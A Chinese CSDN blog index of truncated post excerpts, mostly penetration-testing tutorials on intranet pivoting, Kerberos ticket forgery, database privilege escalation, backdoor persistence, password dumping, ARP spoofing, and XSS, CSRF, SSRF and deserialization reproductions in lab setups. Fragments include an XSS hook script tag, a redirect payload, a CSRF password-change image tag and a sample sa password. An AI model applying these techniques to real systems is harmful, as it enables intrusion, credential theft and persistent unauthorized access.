bbq,-CSDN博客

原创 sqlserver2012详细安装步骤（附每一步的详细截图与sa用户创建方法）

1.启动安装程序2.选择安装3.确定4.下一步5.下一步6.选择激活正版或者试用（此处默认试用）7.接受许可，下一步8.下一步9.选择红框选中内容，下一步10.下一步11.下一步12.下一步13.下一步14.选择混合模式，输入sa密码Venus@2018，再点击添加当前用户，下一步15.下一步16.下一步17.点击安装，等待18.打开sqlserver配置管理器19.查看服务，将未启动的服务启动20.使用sa用户登陆sqlse

2020-06-27 20:56:57 1758

原创 python之——使用python编写爬虫脚本

此处以爬取百度百科为例本文的爬虫组成分为以下几部分1.调度器(controler) 协调几个模块之间的工作2.url管理器(urlmanager) 去重,如果url已经被抓取过，就不在访问该url3.html下载器(htmldownloader) 下载html4.html解析器(htmlparser ) 解析html，解...

2020-04-15 11:52:43 1586

原创 python之——使用python编写爆破脚本

此处以dvwa网站的密码爆破为例#coding:utf-8"""dvwa高级爆破需要用户名密码 token cookie每次通过账号密码访问之前，需要获取token"""import urllib2from bs4 import BeautifulSoupdef getToken(): """提取token""" url="http://localhos...

2020-04-15 11:43:44 3178 1

原创 python之——使用python编写端口扫描脚本

1.直接修改脚本里的端口和ip地址使用脚本源码：#coding:utf-8#端口扫描利用聊天室客户端，如果端口开发，正常连接，如果没开放报错import socketimport threadpoolhost="127.0.0.1"def scanner(host,port): try: s=socket.socket(socket.AF_INET,...

2020-04-15 11:41:47 2930

原创 2019OWASP漏洞top10

A1 注入 InjectionA2 失效的身份认证和会话管理A3 跨站脚本-XSSA4 直接引用不安全的对象 Insecurity Direct Object ReferenceA5 安全配置错误 Security MisconfigurationA6 敏感信息泄露 Sensitive Data ExposureA7 缺少功能级访问控制A8 跨站请求伪造 CSRFA9 使用含...

2020-04-13 19:25:41 8208 3

原创 python之——最入门的python基础知识学习

一、Python介绍 Python是一种解释型、面向对象、动态数据类型的高级程序设计语言，Python由Guido van Rossum于1989年底发明，第一个公开发行版发行于1991年，像Perl语言一样, Python 源代码同样遵循 GPL(GNU General Public License)协议。 ython的3.0版本，常被称为Python 3000，或简称Py3k...

2020-04-07 16:45:24 3897 7

原创内网渗透之——内网转发（反弹shell、端口、代理）

目的渗透测试中，我们往往会面对十分复杂的内网环境，比如最常用的防火墙，它会限制特定端口的数据包出入。需要转发的情况1.A可以访问B的80端口，但是不能访问B的3389端口。2.A可以访问B，B可以访问C，但是A不可以访问C，需要通过B转发数据，让A和C进行通信。代理方式正向代理正向代理是客户端主动访问服务器的端口我们常说的代理就是指正向代理，正向代理的过程，它...

2020-04-03 15:44:11 11308 3

原创内网渗透之——域渗透里常用的域控权限维持方法

前言在我们拿到域控账号密码后，为了防止密码被改，需要使用权限维持来维持我们取得的域控权限具体域控账号密码获取方法点此跳转域票据验证流程1.首先将明文密码发送给AS服务器，AS服务器给我们一个TGT2.拿着TGT去访问TGS服务器,TGS服务器给我们一个ST3.使用获取到的ST访问对应的服务域控权限维持-黄金票据介绍ms14068的漏洞原理是伪造域管的TGT，而黄金票...

2020-04-03 10:39:47 2726 1

原创内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码

条件知道域名，sid，并拥有一个域普通用户的账号密码和并知道域控的名称域名获取：ipconfig /all sid获取：whoami /all查询域控：net time /domain利用过程1.利用该漏洞伪装票据2.导出域hash3.破解文件利用该漏洞伪装票据1.拿到一台普通域用户机器，获取sid2.域名，域控名获取（...

2020-03-31 19:34:55 2673 3

原创内网渗透之——内网arp欺骗工具使用

原理arp工作原理arp协议是地址解析协议，就是将ip地址解析为mac地址，数据链路层通过mac地址进行通信，arp协议通过广播发送request请求包和接收response响应包来正常工作，请求包是寻找网关，响应包是回复我是网关，我的mac地址是，中间没有身份验证arp欺骗原理主机A通过广播发送request请求包，寻找网关192.168.1.1，此时主机b(非网关的同网段机器)...

2020-03-30 19:24:54 3801

原创内网渗透之——常规渗透方式及思路(端口扫描、弱口令扫描、ms17_010利用、hash注入、远程连接&执行程序......)

端口扫描常见端口以及攻击方式具体扫描方法点此跳转我的另一文章，里面详细介绍了端口扫描工具的使用弱口令扫描弱口令扫描，例如对于mysql，vnc，rdp，http管理登录等弱口令进入的服务，可以使用一些弱口令扫描工具，xscan，hydra，medusa，nmap等。也可以自己找到更多更好的工具hydra1.先用nmap扫描开发了哪些端口2.使用hydra对可以进行弱...

2020-03-25 19:49:43 7219

原创内网渗透之——网络信息收集(内网区域其他主机的信息收集、端口扫描、以及域里的一些常用命令)

端口扫描内网环境nmap是一个跨平台的信息收集工具，基于命令行，当然也有图形化界面，znmap，当进入内网后，操作与外网扫描基本一致，只是把对一个ip改为对一系列的ip地址段进行扫描namp1.直接上传nmap到目标机1.1扫描内网有多少主机在线nmap.exe -sP 内网地址段或单个ip内网地址段：192.168.x.x 172.16.x.x -172....

2020-03-25 19:34:45 3852

原创内网渗透之——内网本机信息收集(一些常用的查看命令以及获取管理员密码)

1.获取当前用户密码点此跳转我的另一篇文章，里面详细接受了windows和linux各种获取密码的方式2.查看用户列表windows：net userlinux：cat /etc/passwd3.查看进程列表windows：tasklist关闭进程（比如杀毒软件，找到后直接关闭）：taskkill /pid 进程号linux...

2020-03-23 18:12:48 2050

原创内网渗透之——权限维持(获取windows、linux密码，安装后门程序)

介绍当攻击者获取服务器权限后，通常会采用一些后门技术来维持自己当前得到的权限，服务器一旦被植入后门，那么攻击者下次进入就方便多了目的由于攻击可能被发现，被发现后可能会被将之前拿到的的webshell清除，导致目标丢失，所以需要留下后门来维持权限，达到持续控制的目的获取系统登陆账号密码windows获取系统登陆账号密码windows系统账号密码存储位置：C...

2020-03-23 11:00:48 7750 6

原创内网渗透之——数据压缩、传输

数据压缩作用：将文件打包，方便下载Linux直接使用tar命令压缩windows利用Rar.exe(winrar.exe里的执行文件)参数说明:a 添加文件到压缩文件中-k 锁定压缩文件-s产生固体存档,这样可以增大压缩比-r包括子目录-m 设置压缩比 -m0 存储添加到压缩文件时不压缩文件。 -m1 最快使用最快方式(低...

2020-03-19 15:01:00 2350 1

原创内网渗透之——reduh端口转发工具使用介绍

1.将reDuhServers\reDuh.aspx上传到网站目录2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口java -jar Desktop\reDuh-master\reDuhClient\dist\reDuhClient.jar http://192.168.16.129...

2020-03-17 11:17:28 1394 2

原创内网渗透之——msf工具使用

1.msfconsole作用：管理生成exp，管理反弹的shell，通过反弹的shell进行后渗透。。。模块介绍：exploits：攻击脚本payloads：攻击载荷(攻击效果控制)auxiliaru：辅助模块(扫描工具等)post：后渗透模块(提取信息)encoders编码模块nops:无操作生成器2.msfvenom作用：制作木马3.msfencode作用：对木马...

2020-03-16 17:51:02 7354 3

转载 Linux 常见面试题

Linux 概述什么是Linux？Linux是一套免费使用和自由传播的类Unix操作系统，是一个基于POSIX和Unix的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的Unix工具软件、应用程序和网络协议。它支持32位和64位硬件。Linux继承了Unix以网络为核心的设计思想，是一个性能稳定的多用户网络操作系统。Unix和Linux有什么区别？Linux和Unix都是功能...

2020-03-12 21:57:38 1121 1

转载程序员常见面试题汇总

1.Java基础知识面试题（2020）2.Java集合容器面试题（2020）3.Java异常面试题（2020）4.JVM面试题（2020）5.Spring面试题（2020）6.Spring MVC面试题（2020）7.Spring Boot面试题（2020）8.Spring Cloud面试题（2020）9.MyBatis面试题（2020）10.Redis面试题（2020）11....

2020-03-12 21:40:50 1712 1

原创内网渗透之——mssql数据库提权之——xp_cmdshell执行系统命令

条件所谓利用数据进行提权，利用的其实是数据库的运行权限，所以只要我们满足以下条件即可进行提权：1、必须获得sa的账号密码或者与sa相同权限的账号密码，且mssql没有被降权。2、必须可以以某种方式执行sql语句，例如：webshell或者是1433端口的连接。提权基本思路过程与原理1.MSSQL在Windows server类的操作系统上，默认具有system权限。System...

2020-03-12 21:22:22 5967 3

原创内网渗透之——windows提权之——利用第三方软件Filezilla提权

介绍FileZilla是一个免费开源的FTP软件，分为客户端版本和服务器版本，具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具，而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件Filezilla和普通Web网站一样，前台有普通FTP账户执行上传、下载、删除...

2020-03-12 20:59:11 1433 3

原创内网渗透之——mysql数据库提权之——MOF提权

前题只能在windows使用，应用范围：2008以下的系统，Mysql5.7以下(--secure_file_prive:此配置写文件不限制)介绍mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡条件mysql服务器配置允许root用户远程连接...

2020-03-11 20:15:42 1026 2

原创内网渗透之——mysql数据库提权之——开机启动项提权

前提：只能在windows使用原理利用mysql，将后门写入开机自启动项，因为是开机自启动，在写入之后，需要重启目标服务器才能生效(要求mysql的权限要很高，至少是管理员权限甚至需要system权限)开机启动程序上传路径C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...

2020-03-11 19:44:03 857 1

原创内网渗透之——mysql数据库提权之——UDF提权

介绍UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。原理UDF可以理解为MySQL的函数库，可以利用UDF定义创建函数（其中包括了执行系统命令的函数），要想利用udf，必须上传udf.dll作为udf的执行库，mysql中支持UDF扩展，使得我们可以调用DLL里面的函数来实现一些特殊的功能...

2020-03-11 19:27:14 2065 2

原创内网渗透之——linux本地漏洞提权之——溢出提权

利用系统内核提权漏洞基本思路1.判断系统版本 uname －a（Linux查看操作系统内核信息） cat /proc/version （Linux查看当前操作系统版本信息） cat /etc/issue或cat /etc/redhat-release（Linux查看版本当前操作系统发行版信息）2.根据内核版本去找对应的exp3.获取交互式shell...

2020-03-10 22:09:50 1273 2

原创内网渗透之——windows本地漏洞提权之——溢出提权

利用本地服务提权漏洞基本思路1.systeminfo收集补丁信息执行命令:systeminfo 查看系统信息(包含补丁信息)2.对比补丁编号，寻找可用exp(Exploit，漏洞攻击脚本)寻找此版本存在的所有漏洞，对比此服务器有哪些没有打过补丁，利用没打补丁的漏洞exp攻击3.将合适的exp上传到服务器【可利用dama(密码xiaowang520)、菜刀上传】exp上传...

2020-03-10 20:43:25 2164 2

原创 web渗透里常见的逻辑漏洞

漏洞原理网站开发人员在建设网站的时候，由于验证不严格，造成的bug漏洞危害任意用户重置密码提权/越权任意金额购买验证码绕过…漏洞利用1.修改任意用户密码环境：自行搭建的登陆平台条件：修改密码时会发送修改的url到指定邮箱，并且此url长期有效(url包括用户名和令牌)漏洞复现1.正常注册一个用户，获取忘记密码时找回密码的url2.修改url里的用户名为其他用户，...

2020-03-04 14:34:38 2492 2

原创 typecho反序列化漏洞原理及复现过程

漏洞介绍Typecho是一个简单，轻巧的博客程序。基于PHP，使用多种数据库（Mysql，PostgreSQL，SQLite）储存数据。在GPL Version 2许可证下发行，是一个开源的程序，目前使用SVN来做版本管理漏洞形成由于源码的以下几行存在反序列化漏洞与逻辑绕过，形成漏洞漏洞利用思路：由于install.php代码验证了finish参数，请求头HTTP_HOST，po...

2020-03-04 14:26:57 1751 2

原创 Struts2反序列化漏洞

介绍Struts2是一个基于MVC设计模式(java)的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互漏洞环境vulhub/struts2/s2-048漏洞复现1.ubuntu选择vulhub-master/struts2/s2-048目录，输入docker-compose up -d启动环...

2020-03-04 14:23:41 2943 1

原创 web渗透之——PHP反序列化漏洞

漏洞原理PHP反序列化漏洞也叫PHP对象注入，是一个非常常见的漏洞，这种类型的漏洞虽然有些难以利用，但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测，导致反序列化过程可以被恶意控制，进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有，也存在于Java、Python等语言之中，但其原理基本相通漏洞形成将用...

2020-03-04 14:21:57 970 1

原创 web渗透之——任意代码执行漏洞

漏洞原理当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能够控制这个字符串，将造成代码注入漏洞在php中：eval，assert，将字符串当成代码执行preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值漏洞形成如果被执行的字符串是通过前端参数传过来的攻击代码，或者数据库里被植入攻击代码数据，就...

2020-03-04 14:19:10 1569 1

转载 web渗透之——命令执行漏洞

漏洞分类1.web代码层命令执行exec（“whoami”）;2.第三方组件命令执行漏洞WordPress中用来处理图片的ImageMagick组件JAVA中的命令注入漏洞(struts2/ElasticsearchGroovy等)vBulletin 5.x 版本通杀远程代码执行3.系统层面命令执行漏洞MS08-067bash破壳漏洞漏洞原理日常的网络访问中，我们常常可以看到...

2020-03-04 14:17:26 1488 1

原创 xxe漏洞之——漏洞复现

漏洞介绍XXE全称XML External Entity Injection，也就是XML外部实体注入攻击，漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE，就必须懂得XML的一些规则。XML是用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档...

2020-03-04 14:11:06 2395 1

原创 ssrf漏洞之——漏洞复现

漏洞介绍SSRF漏洞：SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造url，由服务端对此url发起请求的一个安全漏洞。漏洞原理SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，并且没有对目标地址做过滤与限制，比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。一般情况下，SSRF访问的目标...

2020-03-04 14:08:55 3136 2

原创 CSRF漏洞之——漏洞复现

介绍CSRF（Cross Site Request Forgery, 跨站请求伪造）是一种网络的攻击方式，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRFCSRF漏洞是因为web应用程序在用户进行敏感操作时，如修改账号密码、添加账号、转账等，没有校验表单token或者http请求头中的referer值，从而导致恶意攻击者利用普通用户的...

2020-03-04 14:03:43 3516 1

原创 xss漏洞之——XSS平台搭建

前言经过测试，如果发现了XSS漏洞，那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:1.kali下的beef(1)kali命令行里输入beef-xss，得到一个脚本<script src="http://127.0.0.1:3000/hook.js"></script>将127.0.0.1改为kali的ip，之后进行植入(2)kali...

2020-03-04 13:57:57 5089 1

原创 xss漏洞之——XSS蠕虫、DDOS攻击

介绍通过构造的 XSS 代码，通过精心构造的 XSS 代码，可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。此处以更改密码为例代码：<img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Chang...

2020-03-04 13:53:04 2386 1

原创 xss漏洞之——钓鱼页面

1.重定向钓鱼：把当前页面重定向到一个钓鱼页面，此处使用百度测试代码：<script>document.location="http://www.baidu.com"</script>注入后效果：2.HTML 注入式钓鱼：使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中代码(页面注入一个登陆界面，通过后台接收)：<html&g...

2020-03-04 13:51:25 2650 1

原创 xss漏洞之——漏洞利用

1.获取cookie进行无密码登陆原理网页被植入网页被植入xss脚本，普通用户访问此网页时，会自动将用户本地的cookie缓存发送到指定远端服务器利用(1)首先登陆一个页面，抓包获取cookie(2)复制此页面里任一选项的url，重启浏览器后直接访问此url，抓包修改cookie为上面获取的登陆成功后的cookie(3)页面登陆成功，无需密码2.利用XSS漏洞获取管理员权限(获取...

2020-03-04 13:47:58 1332 2

原创 xss漏洞之——初识xss

xss介绍跨站脚本攻击一-XSS (Cross Site Script)，指的是攻击者往Web页面或者URL里插入恶意JavaScript脚本代码，如果Web应用程序对于用户输入的内容没有过滤,那么当正常用户浏览该网页的时候，嵌入在Web页面里的恶意JavaScript脚本代码会被执行，从而达到恶意攻击正常用户的目的。攻击方式XSS攻击的代码是javas代码xss一般情况是植入到url或者...

2020-03-04 13:41:21 709 3

空空如也

空空如也